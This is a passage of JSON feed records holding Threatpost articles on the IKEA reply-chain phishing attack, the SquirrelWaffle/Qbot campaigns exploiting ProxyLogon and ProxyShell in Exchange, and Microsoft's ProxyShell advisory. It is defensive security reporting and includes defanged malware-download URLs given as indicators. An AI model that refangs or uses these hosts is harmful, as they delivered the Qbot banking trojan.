"Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", "type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-23T00:36:02", "description": "Attackers are gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads, researchers say.\n\nWhat\u2019s still under discussion: whether the offensive is delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle is just one piece of malware among several that the campaigns are dropping.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\n## Slipping Under People\u2019s Noses\n\nIn a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) posted on Friday, Trend Micro researchers \u200b\u200bMohamed Fahmy, Sherif Magdy and Abdelrhman Sharshar said that hijacking email replies for malspam is a good way to slip past both people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\n\u201cDelivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail [gateways] will not be able to filter or quarantine any of these internal emails,\u201d they wrote.\n\nThe attacker also didn\u2019t drop, or use, tools for lateral movement after gaining access to the vulnerable Exchange servers, Trend Micro said. Thus, they left no tracks, as \u201cno suspicious network activities will be detected. Additionally, no malware was executed on the Exchange servers that will trigger any alerts before the malicious email is spread across the environment.\u201d\n\n## Middle East Campaign\n\nTrend Micro\u2019s Incident Response team had decided to look into what researchers believe are SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious Exchange server vulnerabilities.\n\nThey shared a screen capture, shown below, that\u2019s representative of the malicious email replies that showed up in all of the user inboxes of one affected network, all sent as legitimate replies to existing threads, all written in English.\n\nThey found that other languages were used in different regions outside of the Middle East attack they examined. Still, in the intrusions they analyzed that were outside of the Middle East, most of the malicious emails were written in English, according to the report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png>)\n\nMalicious spam received by targets. Source: Trend Micro.\n\n\u201cWith this, the attackers would be able to hijack legitimate email chains and send their malicious spam as replies to the said chains,\u201d the researchers wrote.\n\n## Who\u2019s Behind This?\n\n[Cryptolaemus](<https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/>) researcher [TheAnalyst](<https://twitter.com/ffforward>) disagreed with Trend Micro on its premise that SquirrelWaffle is actually acting as a malware dropper for Qbot or other malwares. Rather, TheAnalyst asserted on Friday that the threat actor is dropping both SquirrelWaffle and Qbot as [discrete payloads](<https://twitter.com/ffforward/status/1461810466720825352>), and the most recent [confirmed SquirrelWaffle drop](<https://twitter.com/ffforward/status/1461810488870944768>) it has seen was actually on Oct. 26.\n\n> it makes it easy for us who tracks them to identify them. A TTP they always comes back to is links to maldocs in stolen reply chains. They are known to deliver a multitude of malware like [#QakBot](<https://twitter.com/hashtag/QakBot?src=hash&ref_src=twsrc%5Etfw>) [#Gozi](<https://twitter.com/hashtag/Gozi?src=hash&ref_src=twsrc%5Etfw>) [#IcedID](<https://twitter.com/hashtag/IcedID?src=hash&ref_src=twsrc%5Etfw>) [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>) and maybe others. &gt;\n> \n> \u2014 TheAnalyst (@ffforward) [November 19, 2021](<https://twitter.com/ffforward/status/1461810468323004417?ref_src=twsrc%5Etfw>)\n\nWith regards to who\u2019s behind the activity, TheAnalyst said that the actor/activity is tracked as tr01/TR (its QakBot affiliate ID)[ TA577](<https://twitter.com/hashtag/TA577?src=hashtag_click>) by Proofpoint and as ChaserLdr by[ Cryptolaemus](<https://twitter.com/Cryptolaemus1>) and that the activity goes back to at least 2020. The actors are easy to track, TheAnalyst said, given small tweaks to their tactics, techniques and procedures (TTPs).\n\nOne such TTP that tr01 favors is adding links to malicious documents included in stolen reply chains, TheAnalyst noted. The threat actor is known to deliver \u201ca multitude of malware,\u201d they said, such as [QakBot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), [Gozi](<https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/>), [IcedID](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), Cobalt Strike and potentially more.\n\n## The Old \u2018Open Me\u2019 Excel Attachment Trick\n\nThe malicious emails carried links (aayomsolutions[.]co[.]in/etiste/quasnam[]-4966787 and aparnashealthfoundation[.]aayom.com/quasisuscipit/totamet[-]4966787) that dropped a .ZIP file containing a malicious Microsoft Excel sheet that downloads and executes a malicious DLL related to the [Qbot](<https://threatpost.com/ta551-tactics-sliver-red-teaming/175651/>) banking trojan.\n\nWhat\u2019s particularly notable, Trend Micro said, is that real account names from the victim\u2019s domain were used as sender and recipient, \u201cwhich raises the chance that a recipient will click the link and open the malicious Microsoft Excel spreadsheets,\u201d according to the report.\n\nAs shown below, the Excel attachment does [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompts targets to choose \u201cEnable Content\u201d to view a protected file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nTrend Micro offered the chart below, which shows the Excel file infection chain.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg>)\n\nExcel file infection chain. Source: Trend Micro.\n\n## The Exchange Tell-Tales\n\nThe researchers believe that the actors are pulling it off by targeting users who are relying on Microsoft Exchange servers that haven\u2019t yet been patched for the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) vulnerabilities.\n\nTrend Micro found evidence in the IIS logs of three compromised Exchange servers, each compromised in a separate intrusion, all having been exploited via the vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 the same CVEs used in ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) intrusions, according to Trend Micro.\n\nThe IIS log also showed that the threat actor is using a [publicly available](<https://github.com/Jumbo-WJB/Exchange_SSRF>) exploit in its attack. \u201cThis exploit gives a threat actor the ability to get users SID and emails,\u201d the researchers explained. \u201cThey can even search for and download a target\u2019s emails.\u201d\n\nThe researchers shared evidence from the IIS logs, replicated below, that depicts the exploit code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png>)\n\nExploiting CVE-2021-26855, as demonstrated by the IIS logs. Source: Trend Micro.\n\nMicrosoft fixed the ProxyLogon vulnerabilities in [March](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and the ProxyShell vulnerabilities in [May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>). Those who\u2019ve applied the [May or July](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) updates are protected from all of these. Microsoft has [reiterated](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) that those who\u2019ve applied the ProxyLogon patch released in [March](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) aren\u2019t protected from ProxyShell vulnerabilities and should install the more recent security updates.\n\n## How to Fend Off ProxyLogon/ProxyShell Attacks\n\nExploiting ProxyLogon and ProxyShell enabled the attackers to slip past checks for malicious email, which \u201chighlights how users [play] an important part in the success or failure of an attack,\u201d Trend Micro observed. These campaigns \u201cshould make users wary of the different tactics used to mask malicious emails and files,\u201d the researchers wrote.\n\nIn other words, just because email comes from a trusted contact is no guarantee that any attachment or link it contains can be trusted, they said.\n\nOf course, patching is the number one way to stay safe, but Trend Micro gave these additional tips if that\u2019s not possible:\n\n * Enable virtual patching modules on all Exchange servers to provide critical level protection for servers that have not yet been patched for these vulnerabilities.\n * Use endpoint detection and response (EDR) solutions in critical servers, as it provides visibility to machine internals and detects any suspicious behavior running on servers.\n * Use endpoint protection design for servers.\n * Apply sandbox technology on email, network and web to detect similar URLs and samples.\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-22T19:26:25", "type": "threatpost", "title": "Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-22T19:26:25", "id": "THREATPOST:836083DB3E61D979644AE68257229776", "href": "https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities in that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nThe ProxyShell bugs that Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting then easy to execute, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) 